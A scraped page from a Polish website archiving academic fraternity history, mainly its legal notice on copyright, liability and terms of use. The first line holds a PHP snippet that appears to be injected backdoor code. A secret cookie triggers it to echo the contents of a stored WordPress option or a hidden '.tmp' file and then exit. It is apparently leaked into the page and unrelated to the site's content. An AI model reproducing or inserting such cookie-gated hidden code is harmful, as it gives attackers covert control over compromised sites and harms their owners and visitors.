if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Nota prawna

 1. „Archiwum Korporacyjne” – „Archiwum Korporacyjne – Archiwum i Muzeum Polskich Korporacji Akademickich” - Copyright Bartłomiej P. Wróblewski 2001 – 2007. Cała zawartość tekstowa, graficzna i inna pojawiająca się w niniejszej stronie stanowi własność „Archiwum Korporacyjnego”. Wszystkie prawa zastrzeżone.
 2. „Archiwum Korporacyjne” prowadzi tę stronę na Twój prywatny użytek. Możesz pobierać materiały prezentowane na tej stronie wyłącznie do własnych, prywatnych i nie komercyjnych celów (nie dotyczy materiałów wykorzystywanych przez dziennikarzy oraz badaczy naukowych), pod warunkiem, że zachowasz w nich wszystkie informacje o prawach autorskich lub inne informacje dotyczące zastrzeżonego charakteru takich materiałów. Bez upoważnienia udzielonego przez „Archiwum Korporacyjne” na piśmie nie wolno rozprowadzać, przesyłać, modyfikować, zamieszczać na innych stronach internetowych ani wykorzystywać zawartości strony do celów publicznych lub komercyjnych, co dotyczy tekstów oraz zdjęć.
 3. Warunki i zastrzeżenia wymienione poniżej dotyczą wszystkich użytkowników strony. Dostęp do strony lub korzystanie z niej oznacza wyrażenie zgody na następujące warunki i zastrzeżenia:
  Prawa autorskie

  Logo i nazwa prezentowane na tej stronie są zarejestrowanymi znakami „Archiwum Korporacyjnego”.

  Wszystkie znaki i materiały, jakie można ujrzeć, przeczytać lub usłyszeć na tej stronie są - o ile wyraźnie nie stwierdzono inaczej - chronione prawem autorskim i nie mogą być wykorzystywane bez wcześniejszej pisemnej zgody „Archiwum Korporacyjnego”.

  Odsyłacze do zewnętrznych stron internetowych

  W zakresie, w jakim dopuszczają to przepisy prawa właściwego, „Archiwum Korporacyjne” wyklucza odpowiedzialność za treść, politykę w zakresie ochrony poufności lub funkcjonowanie wszelkich zewnętrznych stron i/lub witryn, do których odsyłacze (linki) zamieszczone są w niniejszej witrynie internetowej.

  Ograniczenie odpowiedzialności

  Dokłada się starań, aby informacje prezentowane w niniejszej witrynie internetowej były aktualne i zgodne ze stanem faktycznym. Z uwagi na specyfikę działania witryn internetowych „Archiwum Korporacyjne” nie przyjmuje odpowiedzialności za nieaktualne dane, błędy, nieścisłe lub niezgodne ze stanem faktycznym informacje występujące na tej i innych witrynach internetowych. Treści prezentowane na niniejszej witrynie internetowej mogą być zmienione bez uprzedzenia.

  Cała zawartość niniejszej witryny została dostarczona w formie i w treści oglądanej przez użytkownika witryny. „Archiwum Korporacyjne” nie ponosi odpowiedzialności za jakiekolwiek bezpośrednie, przypadkowe, wtórne, pośrednie lub jakiekolwiek inne szkody lub odszkodowania wynikłe z dostępu do i/lub korzystania z tej witryny internetowej.

  „Archiwum Korporacyjne” nie przyjmuje na siebie także żadnej odpowiedzialności za jakiekolwiek uszkodzenia lub wirusy, jakie mogą zainfekować Twój sprzęt komputerowy lub inne urządzenia w związku z dostępem do tej witryny, korzystaniem z niej lub pobieraniem z witryny jakichkolwiek materiałów, danych, tekstów, zdjęć, plików.

  Monitorowanie dostępu

  Korzystający akceptuje monitorowanie dostępu do niniejszej witryny internetowej dla celów statystycznych.

  Przesyłane materiały, pytania i odpowiedzi

  „Archiwum Korporacyjne” nie przyjmuje na siebie i nie ponosi jakiejkolwiek odpowiedzialności za wszelkie materiały dostarczone do któregokolwiek z naszych serwerów. Wszelkie informacje od użytkowników niniejszej strony takie jak komentarze, pytania, sugestie czy pomysły przesłane do „Archiwum Korporacyjnego” traktowane będą jako informacje jawne, nieobciążone jakimikolwiek prawami własności intelektualnej i „Archiwum Korporacyjne” może je wykorzystywać bez żadnych ograniczeń.

  Zmiany warunków i zastrzeżeń

  „Archiwum Korporacyjne” może w dowolnym czasie wprowadzać zmiany do niniejszych warunków i zastrzeżeń aktualizując informacje zamieszczone na tej stronie. Ponieważ takie zmiany są dla Ciebie wiążące, powinieneś okresowo odwiedzać tę stronę, by zapoznać się z aktualnymi warunkami i zastrzeżeniami.
O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }